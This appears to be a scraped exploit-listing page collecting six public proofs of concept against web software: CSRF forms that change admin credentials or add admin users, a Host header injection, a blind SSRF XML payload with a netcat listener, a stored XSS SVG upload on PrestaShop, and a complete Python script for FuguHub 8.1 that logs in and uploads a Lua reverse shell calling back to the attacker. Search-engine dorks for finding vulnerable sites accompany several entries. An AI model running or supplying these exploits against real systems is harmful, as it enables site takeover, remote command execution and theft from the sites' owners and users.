Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : ApPHP MicroCMS v1.0.1 Host header attack Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : http://www.apphp.com/php-microcms/ | | # Dork : ApPHP MicroCMS © ApPHP Admin Login | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] Vulnerability description : An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to: <link href="http://_SERVER['HOST']" (Joomla) ...and append secret keys and tokens to links containing it: <a href="http://_SERVER['HOST']?token=topsecret"> (Django, Gallery, others) ....and even directly import scripts from it: <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4"> (Various) [+] This vulnerability affects : /phpmicrocms/index.php. [+] Attack details : Host header evilhostK8kAwlbV.com was reflected inside a A tag (href attribute). [+] The impact of this vulnerability : An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways. [+] How to fix this vulnerability : The web application should use the SERVER_NAME instead of the Host header. It should also create a dummy vhost that catches all requests with unrecognized Host headers. This can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. Consult references for detailed information. ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : ArticleSetup Script cms V1.02 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : http://articlesynergy.com/ | | # Dork : intext:"© 2011 - Article Setup" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code Update admin informations . [+] Go to the line 6. [+] Set the target site link Save changes and apply . [+] infected file : /admin/adminsettings.php . [+] http://127.0.0.1/q7art/admin/adminsettings.php [+] save code as poc.html . <h2>Update Your Admin Settings</h2> <div class="block"> Settings updated! <form style="padding-left: 15px;" name="submission" enctype="multipart/form-data" method="POST" action="http://127.0.0.1/articles3nichesiteorg/admin/adminsettings.php"> Name: <input name="name" style="width: 250px;" value="Administrator" type="text"> Email: <input name="email" style="width: 250px;" value="indoushka4ever@gmail.com" type="text"> New Password: (Leave the password fields blank to retain old password) <input name="pass1" style="width: 250px;" type="password"> New Password (again): <input name="pass2" style="width: 250px;" type="password"> <div style="clear:both"></div> <input name="update" id="update" type="hidden"> <button type="submit" id="submitstyle" name="save" class="button_colour round_all"><img alt="Bended Arrow Right" src="http://articles3.nichesite.org/admin/images/icons/small/white/Bended Arrow Right.png" width="24" height="24">Update Settings</button> <script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> </form> ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : XEL cms© v1.1 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://cyberxel.com | | # Dork : "contact at: +91-98144 06799, z91-161-2408274 email: info@cyberxel.com" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Admin Panel : /xelcms/ [+] infected file : /xelcms/user/adduser.php [+] line 07 set your target. [+] save code as poc.html <style> @import 'http://cyberxel.com/xelcms/styles/main.css'; #form1 table { font-size: 12px; } </style><link href="http://cyberxel.com/xelcms/fckeditor/_samples/sample.css" rel="stylesheet" type="text/css" /><img src="http://cyberxel.com/xelcms/dzimages/arrowpath.gif" />&nbsp;<a href="users.php" class=td>Users</a> <img src="http://cyberxel.com/xelcms//dzimages/arrowpath2.gif" />&nbsp;Add user</h2> <form id="form1" name="form1" method="post" action="TARGET_SITE/xelcms/user/adduser.php"> <table width="99%" border="0" cellpadding="2" cellspacing="2"> <tr> <td width="8%">Username:</td> <td width="92%"><label> <input name="username" type="text" id="username" style="font-size: 10px;width:300" /> </label></td> </tr> <tr> <td>Password:</td> <td><label> <input name="password" type="password" id="password" style="font-size: 10px;width:300" /> </label></td> </tr> <tr> <td>Confirm password:</td> <td><label> <input name="password2" type="password" id="password2" style="font-size: 10px;width:300" /> </label></td> </tr> <tr> <td>Type:</td> <td><label> <select name="type" id="type" style="font-size: 10px;width:300"> <option value="" selected></option> <option value="Administrator">Administrator</option> <option value="User">User</option> </select> </label></td> </tr> <tr> <td>&nbsp;</td> <td> <input type="submit" name="Submit" value="Create user" style="font-size: 10px;" /> </td> </tr> </table> </form> Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code># Exploit Title: FuguHub 8.1 - Remote Code Execution # Date: 6/24/2023 # Exploit Author: redfire359 # Vendor Homepage: https://fuguhub.com/ # Software Link: https://fuguhub.com/download.lsp # Version: 8.1 # Tested on: Ubuntu 22.04.1 # CVE : CVE-2023-24078 import requests from bs4 import BeautifulSoup import hashlib from random import randint from urllib3 import encode_multipart_formdata from urllib3.exceptions import InsecureRequestWarning import argparse from colorama import Fore requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) #Options for user registration, if no user has been created yet username = 'admin' password = 'password' email = 'admin@admin.com' parser = argparse.ArgumentParser() parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True) parser.add_argument("-rp","--rport", help = "http port [Default 80]") parser.add_argument("-l","--lhost", help = "Your IP", required = True) parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True) args = parser.parse_args() LHOST = args.lhost LPORT = args.lport url = args.rhost if args.rport != None: port = args.rport else: port = 80 def main(): checkAccount() def checkAccount(): print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...") s = requests.Session() # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp") soup = BeautifulSoup(r.content, 'html.parser') search = soup.find('h1') if r.status_code == 404: print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port") exit(0) userExists = False userText = 'User database already saved' for i in search: if i.string == userText: userExists = True if userExists: print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..") login(r,s) else: print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}") createUser(r,s) login(r,s) def createUser(r,s): data = { email : email , 'user' : username , 'password' : password , 'recoverpassword' : 'on' } r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data) print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!") def login(r,s): print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...") data = {'ba_username' : username , 'ba_password' : password} r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz #Veryify login login_Success_Title = 'Web-File-Server' soup = BeautifulSoup(r.content, 'html.parser') search = soup.find('title') for i in search: if i != login_Success_Title: print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...") exit(0) print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...") exploit(r,s) def exploit(r,s): #Find the file server, default is fs r = s.get(f"https://{url}:443/fs/cmsdocs/") code = r.status_code if code == 404: print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ") exit(0) print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell") #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' file_content = f''' <h2> Check ur nc listener on the port you put in <h2> <?lsp if request:method() == "GET" then ?> <?lsp {shell} ?> <?lsp else ?> Wrong request method, goodBye! <?lsp end ?> ''' files = {'file': ('rev.lsp', file_content, 'application/octet-stream')} r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files) if r.text == 'ok' : print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ") r = s.get(f"https://{url}:443/rev.lsp") if __name__=='__main__': try: main() except: print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!") </code></pre>

<pre><code>#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection #Application: PodcastGenerator #Version: v3.2.9 #Bugs: Blind SSRF via XML Injection #Technology: PHP #Vendor URL: https://podcastgenerator.net/ #Software Link: https://github.com/PodcastGenerator/PodcastGenerator #Date of found: 01-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php) 2. Fill all section and Short Description section set as 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test' payload: test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test By the way i used localhost.If you have domain, you can use domain. 3.And upload episodes 4. I am listening on port 3132 because I'm observating for incoming requests nc -lvp 3132 5. And I receive request request: POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1 Host: localhost Content-Length: 101563 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3 Connection: close ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg" Content-Type: image/jpeg image content blaaahblahasdfjblaaah;sdfblaaahasdf asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="title" test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="shortdesc" test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="date" 2023-07-01 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="time" 17:02 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="episodecover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="longdesc" test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="episodenum" 33 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="seasonnum" 33 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="itunesKeywords" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="explicit" no ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="authorname" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="authoremail" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="customtags" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="token" vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz ------WebKitFormBoundarypRUTcUa48pmEcI6Q-- </code></pre>

<pre><code>Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS) Application: prestashop Version: 8.0.4 Bugs: Stored XSS Technology: PHP Vendor URL: https://prestashop.com/ Software Link: https://prestashop.com/prestashop-edition-basic/ Date of found: 30.06.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to Catalog => Products 2. Select arbitary product 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1 Host: localhost Content-Length: 756 sec-ch-ua: sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Accept: application/json Cache-Control: no-cache X-Requested-With: XMLHttpRequest sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55 Connection: close ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="path" ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="path_thumb" ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="file"; filename="malas.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ-- </code></pre>